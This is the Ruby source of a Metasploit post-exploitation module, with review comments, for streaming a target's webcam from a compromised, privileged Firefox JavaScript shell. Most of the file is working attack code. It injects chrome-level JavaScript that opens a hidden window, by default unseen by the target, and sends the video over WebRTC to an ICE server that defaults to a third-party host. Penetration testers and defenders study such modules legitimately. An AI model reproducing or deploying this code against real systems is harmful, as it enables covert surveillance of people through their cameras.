rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/firefox/manage/webcam_chat.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
# Post module that, per its own description, streams a webcam from a
# privileged Firefox JavaScript shell session.
#
# The module fills in an HTML template (offerer.html), Base64-encodes it, has
# the session open it through nsIAppShellService.hiddenDOMWindow.openDialog,
# and then calls connect_video_chat with the same server, channel and offerer
# id. js_exec, load_interface, load_api_code and connect_video_chat are not
# defined in this file; presumably they come from the two included mixins.
class MetasploitModule < Msf::Post
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
  include Msf::Post::WebRTC

  # Registers the module metadata and its four datastore options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox Webcam Chat on Privileged JavaScript Shell',
        'Description' => %q{
          This module allows streaming a webcam from a privileged Firefox JavaScript shell.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'References' => [
          [ 'URL', 'http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode' ]
        ],
        'DisclosureDate' => '2014-05-13',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [SCREEN_EFFECTS],
          'Reliability' => []
        }
      )
    )

    register_options([
      OptBool.new('CLOSE', [false, 'Forcibly close previous chat session', false]),
      OptBool.new('VISIBLE', [false, 'Show a window containing the chat to the target', false]),
      OptInt.new('TIMEOUT', [false, 'End the chat session after this many seconds', -1]),
      # NOTE(review): the default is a third-party host on port 80, so connection
      # setup for the session would pass through a server the operator does not
      # control. Confirm that fits the engagement's data-handling rules, or set
      # ICESERVER explicitly.
      OptString.new('ICESERVER', [true, 'The ICE server that sets up the P2P connection', 'wsnodejs.jit.su:80'])
    ])
  end

  # Module entry point.
  #
  # Stops with an error when os_check returns false. Otherwise it generates a
  # random offerer id and channel name, runs the JavaScript payload in the
  # session, and, when CLOSE is unset and a non-blank result comes back, prints
  # that result and calls connect_video_chat.
  def run
    unless os_check
      print_error 'Windows versions of Firefox are not supported at this time [RM #8810].'
      return
    end

    server = datastore['ICESERVER']
    # 10- and 20-character random alphanumeric strings; presumably these are
    # what pair the two peers on ICESERVER (confirm in Msf::Post::WebRTC).
    offerer_id = Rex::Text.rand_text_alphanumeric(10)
    channel = Rex::Text.rand_text_alphanumeric(20)

    result = js_exec(js_payload(server, offerer_id, channel))

    if datastore['CLOSE']
      # Printed whenever CLOSE is set; `result` is not inspected on this path,
      # so the message does not confirm that the session answered.
      print_status 'Stream closed.'
    elsif result.present?
      print_status result
      connect_video_chat(server, channel, offerer_id)
    else
      print_warning 'No response received'
    end
  end

  # Asks the session for Firefox's HTTP user agent string and reports whether
  # it looks like a non-Windows target.
  #
  # @return [Boolean] true when the user agent does not match /windows/i
  #
  # NOTE(review): if js_exec returns nil, `nil !~ /windows/i` evaluates to true,
  # so a session that gives no answer passes this check. Confirm that is
  # intended.
  def os_check
    user_agent = js_exec(%|
      return Components.classes["@mozilla.org/network/protocol;1?name=http"]
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
    |)
    user_agent !~ /windows/i
  end

  # Builds the JavaScript source that run passes to js_exec.
  #
  # @param server [String] value substituted for the =SERVER= placeholder
  # @param offerer_id [String] value substituted for the =OFFERERID= placeholder
  # @param channel [String] value substituted for the =CHANNEL= placeholder
  # @return [String] JavaScript source embedding the Base64-encoded template
  def js_payload(server, offerer_id, channel)
    interface = load_interface('offerer.html')
    api = load_api_code

    # gsub! edits the template string in place. The values are inserted
    # verbatim, with no escaping for the HTML/JS context; with a String
    # replacement, gsub! also interprets backslash sequences in `server`.
    interface.gsub!(/=SERVER=/, server)
    interface.gsub!(/=CHANNEL=/, channel)
    interface.gsub!(/=OFFERERID=/, offerer_id)

    # NOTE(review): `api` is appended to here but is not referenced again in
    # this method, so as far as this file shows the TIMEOUT snippet never
    # reaches the page and the session would not end on its own. Confirm
    # against load_interface / load_api_code.
    if datastore['TIMEOUT'] > 0
      api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT'] * 1000}); "
    end

    # `url` holds a JavaScript expression, not a Ruby value: either the literal
    # "about:blank" (CLOSE) or a data: URL concatenated with the `html`
    # variable that the script below defines.
    url = if datastore['CLOSE']
            '"about:blank"'
          else
            '"data:text/html;base64,"+html'
          end

    # Window name handed to openDialog: a random 10-character name when VISIBLE
    # is set, '_self' otherwise (presumably '_self' loads the page into the
    # hidden window itself rather than opening a visible one; confirm).
    name = if datastore['VISIBLE']
             Rex::Text.rand_text_alphanumeric(10)
           else
             '_self'
           end

    # The script reports back through the `send` callback taken from
    # `this.send`: the fixed string "Streaming webcam..." when openDialog does
    # not throw (also on the CLOSE path), or the caught exception otherwise.
    # `name` is interpolated inside single quotes; `url` is interpolated as a
    # bare expression. The feature string requests chrome=1.
    %|
      (function(send){
        try {

          var AppShellService = Components
            .classes["@mozilla.org/appshell/appShellService;1"]
            .getService(Components.interfaces.nsIAppShellService);

          var html = "#{Rex::Text.encode_base64(interface)}";
          var url = #{url};
          AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
          send("Streaming webcam...");

        } catch (e) {
          send(e);
        }
      })(this.send);
    |
  end
end